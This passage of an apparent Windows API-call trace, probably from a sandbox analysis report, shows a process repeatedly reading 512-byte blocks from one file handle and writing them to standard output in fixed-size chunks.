[0115.068] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.068] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.068] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] GetFileType (hFile=0x4c) returned 0x1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] GetFileType (hFile=0x4c) returned 0x1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] GetFileType (hFile=0x4c) returned 0x1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] GetFileType (hFile=0x4c) returned 0x1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, 
lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.069] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.069] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 
0x4c [0115.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.070] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.070] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) 
returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0115.071] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.071] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.072] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.072] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType (hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] GetFileType 
(hFile=0x4c) returned 0x1 [0115.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.073] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.073] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] GetFileType (hFile=0x4c) returned 0x1 [0115.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, 
lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, 
lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.074] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.074] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.074] GetFileType (hFile=0x4c) returned 0x1 [0115.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.075] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.076] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.076] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle 
